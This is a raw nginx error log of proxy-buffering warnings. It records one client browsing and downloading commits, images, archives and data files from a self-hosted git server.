2026/02/15 10:55:19 [warn] 818#818: *16087 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/60/0000004608 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=ignore-change", host: "git.hanmocnn.co.kr"
2026/02/15 10:55:19 [warn] 818#818: *16087 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/60/0000004609 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=ignore-all", host: "git.hanmocnn.co.kr"
2026/02/15 10:55:19 [warn] 818#818: *16087 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/61/0000004610 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=show-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=show-all", host: "git.hanmocnn.co.kr"
2026/02/15 10:55:19 [warn] 818#818: *16087 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/61/0000004611 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=ignore-eol HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main?style=unified&whitespace=ignore-eol", host: "git.hanmocnn.co.kr"
2026/02/15 10:55:28 [warn] 819#819: *16192 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/61/0000004612 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fservices%2FgeminiService.ts HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fservices%2FgeminiService.ts", host: "git.hanmocnn.co.kr"
2026/02/15 10:56:53 [warn] 820#820: *16380 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/61/0000004613 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
2026/02/15 10:56:53 [warn] 820#820: *16380 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/61/0000004614 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj%2FOpcUaMinimal.csproj.nuget.dgspec.json HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcUaMinimal%2Fobj%2FOpcUaMinimal.csproj.nuget.dgspec.json", host: "git.hanmocnn.co.kr"
2026/02/15 10:57:33 [warn] 821#821: *16414 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/61/0000004615 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets%2Fimages%2FControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets%2Fimages%2FControlRoom1.png", host: "git.hanmocnn.co.kr"
2026/02/15 12:12:32 [warn] 832#832: *17501 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/61/0000004616 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/archive/adf9a81cb0ea52c9fa32f352b5800e021665bb47.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/archive/adf9a81cb0ea52c9fa32f352b5800e021665bb47.tar.gz", host: "git.hanmocnn.co.kr"
2026/02/15 12:14:36 [warn] 833#833: *17904 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/61/0000004617 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
2026/02/15 12:14:37 [warn] 833#833: *17904 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/61/0000004618 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2Ftemplates%2Ffavicon.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?files=asset_pilot_docker%2Ftemplates%2Ffavicon.ico", host: "git.hanmocnn.co.kr"
2026/02/15 12:14:37 [warn] 833#833: *17904 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/61/0000004619 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets%2Fimages HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=html%2Fassets%2Fimages", host: "git.hanmocnn.co.kr"
2026/02/15 12:14:37 [warn] 833#833: *17904 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/62/0000004620 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2F.venv%2Fbin", host: "git.hanmocnn.co.kr"
2026/02/15 12:14:57 [warn] 833#833: *17962 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/62/0000004621 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr"
2026/02/15 12:14:57 [warn] 833#833: *17962 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/62/0000004622 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/update_status.py?display=source", host: "git.hanmocnn.co.kr"
2026/02/15 12:14:58 [warn] 833#833: *17962 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/62/0000004623 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fassets%2Fimages HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2Fhtml%2Fassets%2Fimages", host: "git.hanmocnn.co.kr"
2026/02/15 12:15:23 [warn] 834#834: *18020 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/62/0000004624 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom1.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom1.png", host: "git.hanmocnn.co.kr"
2026/02/15 12:15:23 [warn] 834#834: *18020 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/62/0000004625 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/.gitignore?display=source", host: "git.hanmocnn.co.kr"
2026/02/15 12:15:24 [warn] 834#834: *18020 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/62/0000004626 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr"
2026/02/15 12:16:15 [warn] 831#831: *18187 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/62/0000004627 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
2026/02/15 12:16:30 [warn] 831#831: *18241 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/62/0000004628 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt.log.3", host: "git.hanmocnn.co.kr"
2026/02/15 12:16:40 [warn] 831#831: *18293 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/62/0000004629 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/components/Header.tsx", host: "git.hanmocnn.co.kr"
2026/02/15 12:21:41 [warn] 832#832: *18692 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/63/0000004630 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-eol HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-eol", host: "git.hanmocnn.co.kr"
2026/02/15 12:21:46 [warn] 832#832: *18694 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/63/0000004631 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?style=split&whitespace=ignore-change", host: "git.hanmocnn.co.kr"
2026/02/15 13:16:44 [warn] 833#833: *18760 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/63/0000004632 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.patch HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.patch", host: "git.hanmocnn.co.kr"
2026/02/15 13:16:44 [warn] 833#833: *18760 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/63/0000004633 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/components/Header.tsx", host: "git.hanmocnn.co.kr"
2026/02/15 13:16:45 [warn] 833#833: *18760 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/63/0000004634 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.diff HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6.diff", host: "git.hanmocnn.co.kr"
2026/02/15 13:16:45 [warn] 833#833: *18760 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/63/0000004635 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/services/geminiService.ts", host: "git.hanmocnn.co.kr"
2026/02/15 13:16:55 [warn] 833#833: *18817 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/63/0000004636 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/database.sqlite", host: "git.hanmocnn.co.kr"
2026/02/15 13:18:49 [warn] 831#831: *19161 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/63/0000004637 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
2026/02/15 13:19:23 [warn] 831#831: *19216 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/63/0000004638 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
2026/02/15 13:19:39 [warn] 827#827: *19272 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/63/0000004639 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
2026/02/15 13:19:40 [warn] 827#827: *19272 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/64/0000004640 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=ignore-all", host: "git.hanmocnn.co.kr"
2026/02/15 13:19:40 [warn] 827#827: *19272 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/64/0000004641 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=ignore-eol HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=ignore-eol", host: "git.hanmocnn.co.kr"
2026/02/15 13:19:40 [warn] 827#827: *19272 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/64/0000004642 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=show-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=show-all", host: "git.hanmocnn.co.kr"
2026/02/15 13:19:40 [warn] 827#827: *19272 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/64/0000004643 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?style=unified&whitespace=ignore-change", host: "git.hanmocnn.co.kr"
2026/02/15 13:20:01 [warn] 827#827: *19325 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/64/0000004644 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/assetpilot.ico", host: "git.hanmocnn.co.kr"
2026/02/15 13:20:47 [warn] 828#828: *19541 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/64/0000004645 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log?display=source HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log?display=source", host: "git.hanmocnn.co.kr"
2026/02/15 13:21:46 [warn] 829#829: *19675 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/64/0000004646 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/npm/data/logs/proxy-host-4_access.log", host: "git.hanmocnn.co.kr"
2026/02/15 13:21:54 [warn] 829#829: *19742 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/64/0000004647 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/images/ControlRoom4.png", host: "git.hanmocnn.co.kr"
2026/02/15 13:21:56 [warn] 829#829: *19742 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/64/0000004648 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/2681563c08aa04fbea2862fbca273762e67c16d6.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/2681563c08aa04fbea2862fbca273762e67c16d6.bundle", host: "git.hanmocnn.co.kr"
2026/02/15 13:22:20 [warn] 832#832: *19807 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/64/0000004649 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/2681563c08aa04fbea2862fbca273762e67c16d6.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/2681563c08aa04fbea2862fbca273762e67c16d6.zip", host: "git.hanmocnn.co.kr"
2026/02/15 13:22:26 [warn] 832#832: *19807 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/65/0000004650 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/90c7377285c0e63de46467557a2f081b33097f03.bundle HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/90c7377285c0e63de46467557a2f081b33097f03.bundle", host: "git.hanmocnn.co.kr"
2026/02/15 13:22:40 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/65/0000004651 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/90c7377285c0e63de46467557a2f081b33097f03.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/90c7377285c0e63de46467557a2f081b33097f03.tar.gz", host: "git.hanmocnn.co.kr"
2026/02/15 13:22:40 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/65/0000004652 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=ignore-all", host: "git.hanmocnn.co.kr"
2026/02/15 13:22:40 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/65/0000004653 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=ignore-change", host: "git.hanmocnn.co.kr"
2026/02/15 13:22:40 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/65/0000004654 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=show-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=show-all", host: "git.hanmocnn.co.kr"
2026/02/15 13:22:40 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/65/0000004655 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=ignore-eol HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/commit/90c7377285c0e63de46467557a2f081b33097f03?style=unified&whitespace=ignore-eol", host: "git.hanmocnn.co.kr"
2026/02/15 13:22:40 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/65/0000004656 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=ignore-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=ignore-all", host: "git.hanmocnn.co.kr"
2026/02/15 13:22:40 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/65/0000004657 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=ignore-change HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=ignore-change", host: "git.hanmocnn.co.kr"
2026/02/15 13:22:42 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/65/0000004658 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=show-all HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=show-all", host: "git.hanmocnn.co.kr"
2026/02/15 13:22:42 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/65/0000004659 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom6.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom6.png", host: "git.hanmocnn.co.kr"
2026/02/15 13:22:42 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/66/0000004660 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/2681563c08aa04fbea2862fbca273762e67c16d6.tar.gz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/2681563c08aa04fbea2862fbca273762e67c16d6.tar.gz", host: "git.hanmocnn.co.kr"
2026/02/15 13:22:44 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/66/0000004661 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=ignore-eol HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main?style=unified&whitespace=ignore-eol", host: "git.hanmocnn.co.kr"
2026/02/15 13:22:44 [warn] 832#832: *19874 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/66/0000004662 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/branch/main/.Backup/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
2026/02/15 13:23:11 [warn] 832#832: *19938 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/66/0000004663 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/archive/90c7377285c0e63de46467557a2f081b33097f03.zip HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/archive/90c7377285c0e63de46467557a2f081b33097f03.zip", host: "git.hanmocnn.co.kr"
2026/02/15 13:23:13 [warn] 832#832: *19938 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/66/0000004664 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/assets/images/ControlRoom3.png", host: "git.hanmocnn.co.kr"
2026/02/15 13:23:13 [warn] 832#832: *19938 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/66/0000004665 while reading upstream, client: 216.73.216.188, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/images/ControlRoom2.png", host: "git.hanmocnn.co.kr"
